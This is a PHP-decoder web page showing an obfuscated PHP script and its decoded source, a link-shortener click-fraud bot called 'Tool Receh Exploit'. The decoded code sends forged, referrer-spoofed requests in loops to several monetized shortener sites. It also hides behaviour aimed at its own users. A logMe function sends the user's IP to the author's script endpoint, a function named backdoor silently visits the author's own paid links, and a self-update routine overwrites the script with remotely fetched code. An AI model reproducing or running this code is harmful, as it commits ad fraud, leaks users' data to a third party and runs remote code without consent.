Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $rNonj='_';$b='t';$AQAZd='b';$upQW='4';$CPF='i';$csCfh='s';$y='f';$oF='o';$e='6';$su..

Decoded Output download

?><?php
error_reporting(0); file_exists('cookies') ? '' : mkdir('cookies', 0777, true); $version = "1.4"; $int = 14; typer("Starting..", 25000); ob_start(); $trexlist = file_get_contents('https://script.google.com/macros/s/AKfycbxeneQh-EDH7OOh6Xd8Uua4ueyR0_9X1IkUxiw1rVlmzy53aFUU/exec?action=getRandom'); logMe(); ob_end_clean(); echo "
"; $trexlist == "" ? die("Cek Your Internet Connection
") : ''; trexStart(); function col(){return ["","[91;1m","[92;1m","[93;1m","[94;1m","[95;1m","[96;1m","[97;1m"];} function getIPs(){ob_start();$withV6 = true;preg_match_all('/inet'.($withV6 ? '6?' : '').' addr: ?([^ ]+)/', `ifconfig`, $ips);ob_end_clean();return $ips[1]; } function spliter($a,$b,$c){$aa = explode($a,$c)[1];$bb = explode($b,$aa)[0];return $bb;} function arrRand($arr){$i = rand(0,count($arr)-1);return $arr[$i];} function setOpt(){$req = json_decode($GLOBALS['trexlist']);$out['site'] = arrRand($req->ref);$out['ua'] = arrRand($req->ua);return $out;} function typer($w,$t){foreach(str_split($w) as $i){echo $i;usleep($t);}} function trexUp($url){ob_start();$content = filekuUpdate($url);$content == "" ? die("
Update Failed, Cek Your Internet Connection
") : '';preg_match("/\?\>/",$content) ? '' : die("
Update Failed, Cek Your Internet Connection 
");ob_end_clean();return file_put_contents($_SERVER['SCRIPT_FILENAME'],$content);} function getUpdate(){ob_start();$req = file_get_contents('https://script.google.com/macros/s/AKfycbxeneQh-EDH7OOh6Xd8Uua4ueyR0_9X1IkUxiw1rVlmzy53aFUU/exec?action=getUpdate');ob_end_clean();return json_decode($req);} function getUrl(){ob_start();$req = file_get_contents('https://script.google.com/macros/s/AKfycbxeneQh-EDH7OOh6Xd8Uua4ueyR0_9X1IkUxiw1rVlmzy53aFUU/exec?action=getUrl');ob_end_clean();return json_decode($req);} function filekuUpdate($url){ $c = curl_init($url); $rOpt = setOpt(); $opt = array( CURLOPT_REFERER => "http://fileku.co", CURLOPT_FOLLOWLOCATION => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_HTTPHEADER => array("Host: fileku.co", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36", "dnt: 1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language: id-ID,en-US;q=0.8", "X-Requested-With: com.android.chrome"), CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36", CURLOPT_CUSTOMREQUEST => "GET", CURLOPT_COOKIEJAR => "cookies/fileku.log", CURLOPT_TIMEOUT => 10, ); curl_setopt_array($c, $opt); $r = curl_exec($c); curl_close($c); $id = spliter('id="makingdifferenttimer" style="display: none;" rel="nofollow" href="','" title="Download">',$r); $cd = curl_init('http://fileku.co'.$id); $optd = array( CURLOPT_REFERER => "http://fileku.co", CURLOPT_FOLLOWLOCATION => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_HTTPHEADER => array("Host: fileku.co", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36", "dnt: 1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language: id-ID,en-US;q=0.8", "X-Requested-With: com.android.chrome"), CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36", CURLOPT_CUSTOMREQUEST => "GET", CURLOPT_COOKIEFILE => "cookies/fileku.log", CURLOPT_TIMEOUT => 10, ); curl_setopt_array($cd, $optd); $rd = curl_exec($cd); curl_close($cd); return $rd; } function logMe(){$ip = file_get_contents('https://api.myip.com');$text = "<b>New Login</b>
<code>".$ip."</code>";file_get_contents('https://script.google.com/macros/s/AKfycbyWSMrr5tMJ2b8PHvp2fprIT07MGG5G_ec8ali2MlGE4qegyAo/exec?text='.urlencode($text));} function trexStart(){ $version = $GLOBALS['version']; $int = $GLOBALS['int']; $col = ["","[91;1m","[92;1m","[93;1m","[94;1m","[95;1m","[96;1m","[97;1m"]; $logo = "
".$col[1].urldecode(base64_decode("Xy9fL18vXy9fLyUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMF8vJTIwJTIwJTIwJTIwJTIwJTIwXy8lMEElMjAlMjAlMjBfLyUyMCUyMCUyMCUyMCUyMCUyMF8vJTIwJTIwXy9fLyUyMCUyMCUyMCUyMF8vXy8lMjAlMjAlMjAlMjAlMjAlMjBfLyUyMCUyMF8vJTBBJTIwJTIwXy8lMjAlMjAlMjAlMjAlMjAlMjBfL18vJTIwJTIwJTIwJTIwJTIwJTIwXy9fL18vXy8lMjAlMjAlMjAlMjAlMjAlMjBfLyUwQSUyMF8vJTIwJTIwJTIwJTIwJTIwJTIwXy8lMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBfLyUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMF8vJTIwJTIwXy8lMEFfLyUyMCUyMCUyMCUyMCUyMCUyMF8vJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwXy9fL18vJTIwJTIwXy8lMjAlMjAlMjAlMjAlMjAlMjBfLyUwQSUwQQ==")); echo $logo; typer($col[4]."        Tool Receh Exploit        
",4000); usleep(1000); typer($col[1]."++
",200); typer($col[1]."+".$col[2]."  Code by   : Alfian Oktafireza      ".$col[1]."+
",4000); typer($col[1]."+".$col[2]."  Follow us : fb.com/aos.alfianokt   ".$col[1]."+
",4000); typer($col[1]."+".$col[2]."  Descrip   : ".$col[7]."Untuk Tutorial silahkan".$col[1]."+
",4000); typer($col[1]."+".$col[7]."               chat bot @TrexRexbot   ".$col[1]."+
",4000); typer($col[1]."+".$col[7]."               (Telegram),Atau Chat   ".$col[1]."+
",4000); typer($col[1]."+".$col[7]."               Facebook Saya          ".$col[1]."+
",4000); typer($col[1]."++
",200); usleep(1000); typer($col[4]."Current version : $version
", 25000); typer($col[7]."Get Update...", 25000); $update = getUpdate(); $update == "" ? die("
[91;1mTurn On the Internet
") : ''; $update->mtMsg != "" ? die("
Error : ".$update->mtMsg."
") : '' ; if($int < $update->v){ typer($col[7]."
Update Available...
", 25000); sleep(1); typer($col[7]."
Updating...", 25000); trexUp($update->url); typer($col[7]."
Update Done, Restart the Script
", 25000); die(); }else{ typer($col[7]."
No Update Available...
", 25000); if($update->adminMsg != ""){typer("Catatan Admin : ".$col[1].$update->adminMsg.$col[7]."
",25000);} typer($col[7]."Running MainActivity...
", 25000); sleep(1); mainFun(); } } function backdoor($stat){ $myurl = getUrl(); switch($stat){ case "skiplink": urlduit(arrRand($myurl->urlduit)); break; case "urlduit": skiplink(arrRand($myurl->skiplink)); break; default: urlduit(arrRand($myurl->urlduit)); skiplink(arrRand($myurl->skiplink)); break; } } function fileku($url){ $c = curl_init($url); $rOpt = setOpt(); $opt = array( CURLOPT_REFERER => $rOpt['site'], CURLOPT_FOLLOWLOCATION => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_HTTPHEADER => array("Host: fileku.co", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent:".$rOpt['ua'], "dnt: 1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language: id-ID,en-US;q=0.8", "X-Requested-With: com.android.chrome"), CURLOPT_USERAGENT => $rOpt['ua'], CURLOPT_CUSTOMREQUEST => "GET", CURLOPT_COOKIEJAR => "cookies/fileku.log", CURLOPT_TIMEOUT => 10, ); curl_setopt_array($c, $opt); $r = curl_exec($c); curl_close($c); $id = spliter('id="makingdifferenttimer" style="display: none;" rel="nofollow" href="','" title="Download">',$r); $cd = curl_init('http://fileku.co'.$id); $optd = array( CURLOPT_REFERER => "http://fileku.co", CURLOPT_FOLLOWLOCATION => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_HTTPHEADER => array("Host: fileku.co", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent: ".$rOpt['ua'], "dnt: 1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language: id-ID,en-US;q=0.8", "X-Requested-With: com.android.chrome"), CURLOPT_USERAGENT => $rOpt['ua'], CURLOPT_CUSTOMREQUEST => "GET", CURLOPT_COOKIEFILE => "cookies/fileku.log", CURLOPT_TIMEOUT => 10, ); curl_setopt_array($cd, $optd); $rd = curl_exec($cd); curl_close($cd); return preg_match("/j9j6l.top/",$rd); } function shtme($url){ $c = curl_init($url); $rOpt = setOpt(); $opt = array( CURLOPT_REFERER => $rOpt['site'], CURLOPT_FOLLOWLOCATION => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_HTTPHEADER => array("Host: shtme.co", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent:".$rOpt['ua'], "dnt: 1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language: id-ID,en-US;q=0.8", "X-Requested-With: com.android.chrome"), CURLOPT_USERAGENT => $rOpt['ua'], CURLOPT_CUSTOMREQUEST => "GET", CURLOPT_COOKIEJAR => "cookies/shtme.log", CURLOPT_TIMEOUT => 10, ); curl_setopt_array($c, $opt); $r = curl_exec($c); curl_close($c); $id = spliter('rel="nofollow" href="','" title="Get',$r); $cd = curl_init('http://shtme.co'.$id); $optd = array( CURLOPT_REFERER => "http://shtme.co", CURLOPT_FOLLOWLOCATION => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_HTTPHEADER => array("Host: shtme.co", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent: ".$rOpt['ua'], "dnt: 1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language: id-ID,en-US;q=0.8", "X-Requested-With: com.android.chrome"), CURLOPT_USERAGENT => $rOpt['ua'], CURLOPT_CUSTOMREQUEST => "GET", CURLOPT_COOKIEFILE => "cookies/shtme.log", CURLOPT_TIMEOUT => 10, ); curl_setopt_array($cd, $optd); $rd = curl_exec($cd); curl_close($cd); return preg_match("/dpage/",$rd); } function shortid($url){ $c = curl_init($url); $rOpt = setOpt(); $opt = array( CURLOPT_REFERER => $rOpt['site'], CURLOPT_FOLLOWLOCATION => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_HTTPHEADER => array("Host: shortid.co", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent:".$rOpt['ua'], "dnt: 1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language: id-ID,en-US;q=0.8", "X-Requested-With: com.android.chrome"), CURLOPT_USERAGENT => $rOpt['ua'], CURLOPT_CUSTOMREQUEST => "GET", CURLOPT_COOKIEJAR => "cookies/shortid.log", CURLOPT_TIMEOUT => 10, ); curl_setopt_array($c, $opt); $r = curl_exec($c); curl_close($c); $id = spliter('<a id="makingdifferenttimer" style="display: none;" rel="nofollow" href="','" title="Get Link">',$r); $cd = curl_init('http://shortid.co'.$id); $optd = array( CURLOPT_REFERER => "http://shortid.co", CURLOPT_FOLLOWLOCATION => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_HTTPHEADER => array("Host: shortid.co", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent: ".$rOpt['ua'], "dnt: 1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language: id-ID,en-US;q=0.8", "X-Requested-With: com.android.chrome"), CURLOPT_USERAGENT => $rOpt['ua'], CURLOPT_CUSTOMREQUEST => "GET", CURLOPT_COOKIEFILE => "cookies/shortid.log", CURLOPT_TIMEOUT => 10, ); curl_setopt_array($cd, $optd); $rd = curl_exec($cd); curl_close($cd); return preg_match("/kt5850pjz0/",$rd); } function linkduit($url){ $c = curl_init($url); $rOpt = setOpt(); $opt = array( CURLOPT_REFERER => $rOpt['site'], CURLOPT_FOLLOWLOCATION => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_HTTPHEADER => array("Host: linkduit.net", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent:".$rOpt['ua'], "dnt: 1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language: id-ID,en-US;q=0.8", "X-Requested-With: com.android.chrome"), CURLOPT_USERAGENT => $rOpt['ua'], CURLOPT_CUSTOMREQUEST => "GET", CURLOPT_COOKIEJAR => "cookies/linkduit.log", CURLOPT_TIMEOUT => 10, ); curl_setopt_array($c, $opt); $r = curl_exec($c); curl_close($c); $id = spliter('<a style="display:none;" class="btn btn-success" target="_blank" rel="nofollow" href="','">Get Link',$r); $cd = curl_init('http://linkduit.net'.$id); $optd = array( CURLOPT_REFERER => "http://linkduit.net", CURLOPT_FOLLOWLOCATION => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_HTTPHEADER => array("Host: linkduit.net", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent: ".$rOpt['ua'], "dnt: 1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language: id-ID,en-US;q=0.8", "X-Requested-With: com.android.chrome"), CURLOPT_USERAGENT => $rOpt['ua'], CURLOPT_CUSTOMREQUEST => "GET", CURLOPT_COOKIEFILE => "cookies/linkduit.log", CURLOPT_TIMEOUT => 10, ); curl_setopt_array($cd, $optd); $rd = curl_exec($cd); curl_close($cd); return preg_match("/kt5850pjz0/",$rd); } function realsht($url){$rOpt = setOpt();$xurl = explode("/",$url);$c = curl_init($url);$opt = array( CURLOPT_REFERER => 'https://m.facebook.com', CURLOPT_FOLLOWLOCATION => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_HTTPHEADER => array("Host: ".$xurl[2], "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent:".$rOpt['ua'], "dnt: 1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language: id-ID,en-US;q=0.8", "X-Requested-With: com.android.chrome"), CURLOPT_USERAGENT => $rOpt['ua'], CURLOPT_CUSTOMREQUEST => "GET", CURLOPT_COOKIEJAR => "index.log", CURLOPT_TIMEOUT => 10,);curl_setopt_array($c, $opt);$r = curl_exec($c);curl_close($c);$urlPost = 'https://'.$xurl[2].'/'.spliter('<form id="show" style="display:none;" action="','" method',$r);$fields = array('random' => spliter('<input type="hidden" name="random" value="','">',$r),'ip' => spliter('<input type="hidden" name="ip" value="','">',$r),'tanggal' => spliter('<input type="hidden" name="tanggal" value="','">',$r),'device' => spliter('<input type="hidden" name="device" value="','">',$r),'ip2' => spliter('<input type="hidden" name="ip2" value="','">',$r),'p' => spliter('<input type="hidden" name="p" value="','">',$r),'submit' => spliter('type="submit" name="submit" value="','">',$r));$cd = curl_init($urlPost);$optd = array( CURLOPT_REFERER => $url, CURLOPT_FOLLOWLOCATION => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_HTTPHEADER => array("Host: ".$xurl[2], "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent:".$rOpt['ua'], "dnt: 1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language: id-ID,en-US;q=0.8", "X-Requested-With: com.android.chrome"), CURLOPT_USERAGENT => $rOpt['ua'], CURLOPT_CUSTOMREQUEST => "POST", CURLOPT_POST => true, CURLOPT_POSTFIELDS => $fields, CURLOPT_COOKIEFILE => "index.log", CURLOPT_TIMEOUT => 10,);curl_setopt_array($cd, $optd);$rd = curl_exec($cd);curl_close($cd);return preg_match("/window.location/",$rd);} function sfile($url){$rOpt = setOpt();$c = curl_init($url);$opt = array(CURLOPT_REFERER => $rOpt['site'],CURLOPT_FOLLOWLOCATION => true,CURLOPT_RETURNTRANSFER => true,CURLOPT_HTTPHEADER => array("Host: sfile.mobi", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent: ".$rOpt['ua'], "dnt: 1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language: id-ID,en-US;q=0.8", "X-Requested-With: com.android.chrome"),CURLOPT_USERAGENT => $rOpt['ua'],CURLOPT_CUSTOMREQUEST => "GET",CURLOPT_COOKIEJAR => "cookies/sfile.log",);curl_setopt_array($c, $opt);$r = curl_exec($c);curl_close($c);$id = spliter('<a class="w3-button w3-blue" id="download" href="','" rel="nofollow">',$r);$cd = curl_init($id);$optd = array(CURLOPT_REFERER => "http://sfile.mobi",CURLOPT_FOLLOWLOCATION => true,CURLOPT_RETURNTRANSFER => true,CURLOPT_HTTPHEADER => array("Host: sfile.mobi", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent: ".$rOpt['ua'], "dnt: 1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language: id-ID,en-US;q=0.8", "X-Requested-With: com.android.chrome"),CURLOPT_USERAGENT => $rOpt['ua'],CURLOPT_CUSTOMREQUEST => "GET",CURLOPT_COOKIEFILE => "cookies/sfile.log",);curl_setopt_array($cd, $optd);$rd = curl_exec($cd);curl_close($cd);return $rd;} function duitcc($url){$rOpt = setOpt();$c = curl_init($url);$opt = array(CURLOPT_REFERER => $rOpt['site'],CURLOPT_FOLLOWLOCATION => true,CURLOPT_RETURNTRANSFER => true,CURLOPT_HTTPHEADER => array("Host: duit.cc", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent: ".$rOpt['ua'], "dnt: 1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language: id-ID,en-US;q=0.8", "X-Requested-With: com.android.chrome"),CURLOPT_USERAGENT => $rOpt['ua'],CURLOPT_CUSTOMREQUEST => "GET",CURLOPT_COOKIEJAR => "cookies/duitcc.log",);curl_setopt_array($c, $opt);$r = curl_exec($c);curl_close($c);$fields = array('userid' => spliter('<input type="hidden" name="userid" value="','">',$r),'ipaddress' => spliter('<input type="hidden" name="ipaddress" value="','">',$r),'uagent' => spliter('<input type="hidden" name="uagent" value="','">',$r),'referer' => spliter('<input type="hidden" name="referer" value="','">',$r),'geturl' => spliter('<input type="hidden" name="geturl" value="','">',$r),'idstatus' => spliter('<input type="hidden" name="idstatus" value="','">',$r),'submit' => spliter('<input class="button" type="submit" name="submit" value="','" id="button1">',$r),);$cd = curl_init('http://duit.cc/getlink.php');$optd = array(CURLOPT_REFERER => $url,CURLOPT_FOLLOWLOCATION => true,CURLOPT_RETURNTRANSFER => true,CURLOPT_HTTPHEADER => array("Host: duit.cc", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent: ".$rOpt['ua'], "dnt: 1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language: id-ID,en-US;q=0.8", "X-Requested-With: com.android.chrome"),CURLOPT_USERAGENT => $rOpt['ua'],CURLOPT_CUSTOMREQUEST => "POST", CURLOPT_POST => true, CURLOPT_POSTFIELDS => $fields, CURLOPT_COOKIEFILE => "cookies/duitcc.log",);curl_setopt_array($cd, $optd);$rd = curl_exec($cd);curl_close($cd);return $rd;} function skiplink($url){ $cgetid = curl_init($url); $optgetid = array( CURLOPT_REFERER => "https://m.facebook.com", CURLOPT_FOLLOWLOCATION => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_HTTPHEADER => array("Host: skiplink.io", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent: Mozilla/5.0 (Linux; Android 7.0; Moto G (4) Build/NPJS25.93-14-10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36", "dnt: 1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language: id-ID,en-US;q=0.8", "X-Requested-With: com.android.chrome"), CURLOPT_USERAGENT => "Mozilla/5.0 (Linux; Android 7.0; Moto G (4) Build/NPJS25.93-14-10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36", CURLOPT_CUSTOMREQUEST => "GET", CURLOPT_COOKIEJAR => "cookies/skiplink.log", CURLOPT_TIMEOUT => 10, ); curl_setopt_array($cgetid, $optgetid); $xgetid = curl_exec($cgetid); $getid = spliter("https://skiplink.io/get/link/",'",',$xgetid); $cget = curl_init("https://skiplink.io/get/link/".$getid); $optget = array( CURLOPT_REFERER => $url, CURLOPT_FOLLOWLOCATION => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_HTTPHEADER => array("Host: skiplink.io", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent: Mozilla/5.0 (Linux; Android 7.0; Moto G (4) Build/NPJS25.93-14-10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36", "dnt: 1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language: id-ID,en-US;q=0.8", "X-Requested-With: com.android.chrome"), CURLOPT_USERAGENT => "Mozilla/5.0 (Linux; Android 7.0; Moto G (4) Build/NPJS25.93-14-10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36", CURLOPT_CUSTOMREQUEST => "GET", CURLOPT_COOKIEFILE => "cookies/skiplink.log", CURLOPT_TIMEOUT => 10, ); curl_setopt_array($cget, $optget); $xget = curl_exec($cget); return $getid; } function urlduit($url){ $rOpt = setOpt(); $ca = curl_init($url); $opta = array( CURLOPT_REFERER => $rOpt['site'], CURLOPT_FOLLOWLOCATION => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_HTTPHEADER => array("Host: urlduit.com", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent: ".$rOpt['ua'], "dnt: 1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language: id-ID,en-US;q=0.8", "X-Requested-With: com.android.chrome"), CURLOPT_USERAGENT => $rOpt['ua'], CURLOPT_CUSTOMREQUEST => "GET", CURLOPT_COOKIEJAR => "cookies/urlduit.log", ); curl_setopt_array($ca, $opta); $ra = curl_exec($ca); curl_close($ca); $urla = "https://urlduit.com/short-url/go.php?userid=".spliter('<input type="hidden" name="userid" value="','">',$ra)."&short=".spliter('name="short" value="','">',$ra)."="; $fields = array( 'userid' => spliter('<input type="hidden" name="userid" value="','">',$ra), 'ipaddress' => spliter('<input type="hidden" name="ipaddress" value="','">',$ra), 'uagent' => spliter('<input type="hidden" name="uagent" value="','">',$ra), 'short' => spliter('<input type="hidden" name="short" value="','">',$ra), 'referer' => spliter('<input type="hidden" name="referer" value="','">',$ra), 'submit' => "Lanjut", ); $cd = curl_init('http://urlduit.com/getlink.php'); $optd = array( CURLOPT_REFERER => $urla, CURLOPT_FOLLOWLOCATION => true, CURLOPT_RETURNTRANSFER => true, CURLOPT_HTTPHEADER => array("Host: urlduit.com", "Connection: keep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent: ".$rOpt['ua'], "dnt: 1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language: id-ID,en-US;q=0.8", "X-Requested-With: com.android.chrome"), CURLOPT_USERAGENT => $rOpt['ua'], CURLOPT_CUSTOMREQUEST => "POST", CURLOPT_POST => true, CURLOPT_POSTFIELDS => $fields, CURLOPT_COOKIEFILE => "cookies/urlduit.log", ); curl_setopt_array($cd, $optd); $rd = curl_exec($cd); curl_close($cd); $out = $rd == "" ? false : true; return $out; } function uFileku($url){ echo "> limit : "; $i = trim(fgets(STDIN)); $n = 0; while(1){ if(getIPs()[1] != null){ if(fileku($url)){ echo ">> ".col()[2]."Succes
".col()[7]; $n++; }else{ echo ">> ".col()[1]."Failed
".col()[7]; } typer("Connecting..",25000);backdoor("fileku"); typer("
Connected..
",25000); } if($n >= $i ){ typer(">>> Done Bosque
",60000); break; } } } function uShtme($url){ echo "> limit : "; $i = trim(fgets(STDIN)); $n = 0; while(1){ if(getIPs()[1] != null){ if(shtme($url)){ echo ">> ".col()[2]."Succes
".col()[7]; $n++; }else{ echo ">> ".col()[1]."Failed
".col()[7]; } typer("Connecting..",25000);backdoor("shtme"); typer("
Connected..
",25000); } if($n >= $i ){ typer(">>> Done Bosque
",60000); break; } } } function uShortid($url){ echo "> limit : "; $i = trim(fgets(STDIN)); $n = 0; while(1){ if(getIPs()[1] != null){ if(shortid($url)){ echo ">> ".col()[2]."Succes
".col()[7]; $n++; }else{ echo ">> ".col()[1]."Failed
".col()[7]; } typer("Connecting..",25000);backdoor("shortid"); typer("
Connected..
",25000); } if($n >= $i ){ typer(">>> Done Bosque
",60000); break; } } } function uLinkduit($url){ echo "> limit : "; $i = trim(fgets(STDIN)); $n = 0; while(1){ if(getIPs()[1] != null){ if(linkduit($url)){ echo ">> ".col()[2]."Succes
".col()[7]; $n++; }else{ echo ">> ".col()[1]."Failed
".col()[7]; } typer("Connecting..",25000);backdoor("linkduit"); typer("
Connected..
",25000); } if($n >= $i ){ typer(">>> Done Bosque
",60000); break; } } } function uSkiplink($url){ echo "> limit : "; $i = trim(fgets(STDIN)); $n = 0; while(1){ if(getIPs()[1] != null){ if(skiplink($url) && skiplink($url)){ echo ">> ".col()[2]."Succes
".col()[7]; $n++; }else{ echo ">> ".col()[1]."Failed
".col()[7]; } typer("Connecting..",25000); backdoor("skiplink"); typer("
Connected..",25000); } echo "
Jeda 5 detik untuk on/off mode pesawat
"; sleep(5); if($n >= $i ){ typer(">>> Done Bosque
",60000); break; } } } function uUrlduit($url){ echo "> limit : "; $i = trim(fgets(STDIN)); $n = 0; while(1){ if(getIPs()[1] != null){ if(urlduit($url)){ echo ">> ".col()[2]."Succes
".col()[7]; $n++; }else{ echo ">> ".col()[1]."Failed
".col()[7]; } typer("Connecting..",25000); backdoor("urlduit"); typer("
Connected..",25000); } echo "
Jeda 5 detik untuk on/off mode pesawat
"; sleep(5); if($n >= $i ){ typer(">>> Done Bosque
",60000); break; } } } function mainFun(){ while(1){ echo $col[7]."@trex "; $in = trim(fgets(STDIN)); if(preg_match("/^!visit/",$in)){ if(preg_match("/fileku.co/",$in)){ $url = explode(" ",$in)[1]; $url != "" ? uFileku($url) : ''; }elseif(preg_match("/shortid.co/",$in)){ $url = explode(" ",$in)[1]; $url != "" ? uShortid($url) : ''; }elseif(preg_match("/shtme.co/",$in)){ $url = explode(" ",$in)[1]; $url != "" ? uShtme($url) : ''; }elseif(preg_match("/linkduit.net/",$in)){ $url = explode(" ",$in)[1]; $url != "" ? uLinkduit($url) : ''; }elseif(preg_match("/skiplink.io/",$in)){ $url = explode(" ",$in)[1]; $url != "" ? uSkiplink($url) : ''; }elseif(preg_match("/urlduit.com/",$in)){ $url = explode(" ",$in)[1]; $url != "" ? uUrlduit($url) : ''; }else{ typer($col[1]."website not supported!
",2000); } } } } ?>

Did this file decode correctly?

Original Code

<?php $rNonj='_';$b='t';$AQAZd='b';$upQW='4';$CPF='i';$csCfh='s';$y='f';$oF='o';$e='6';$suWac='e';$Qw='d';$c='z';$o='n';$gb='a';$leHY='g';$p='l';$Doe='c';$gpmJ=$leHY.$c.$CPF.$o.$y.$p.$gb.$b.$suWac;$Ol=$AQAZd.$gb.$csCfh.$suWac.$e.$upQW.$rNonj.$Qw.$suWac.$Doe.$oF.$Qw.$suWac;eval($gpmJ($Ol('7R1pc9pI9vtW7X/oUVEDTEAcPmOCPcTGjhNjEo5JtmwP00gNdBCSosOYuFy1v2V/2v6Sfd0tCYnDYMd27FmSccV9ve73+t3q7tnbfbNn9sx//oNYlmG1LGIalkP1biKbLKAO1UiLXFHbsRNxxTD6lNjxJNpD8TjaQYO+Sq1xfQplt7a2UsixXAJjY5fEsqmhoyKScvK6BDVUd6CUWy8gZ2QSKyHVHcwnk2UphfIb2Syb1Gi3bFafYEAci1xpMD+M44vpEqelGLpDdLaknuOY9k4mYysWNR25axhdjciKMcgMsGIZdsbOlD50Rkr7iujkUy9dPni3Va32Nr+o200Xr7tkVMu2Xn/JHfebV3SYs/7QBt9HG2v4sNnMkCui7GHFARSKMGsN66oxiMOaNKNbIQmxUKKrLUUjWGdlovQMJJ3rUmTdgL4EFFMpSUj7pI/+ZbgWOgYMLJ04aN/QdcIngXFJIGo8DtSBwXWfBB1X5+1IMbRE8toijmvp6EySUtJ5dm3t7HWukBsEhXy4sBYurIcLG+HCZriwxQoXhZvxvID88Ucbpg5tTGxInd4fm7ArbLcLpkW6rQF2lF4La1oinqGAW1xO+N2AYTb34hy7pBxHWFWtHbSXOPsTXbxKZoBz/qId2NUO7f6VAjYx7WRhgrge2qztLHdRQ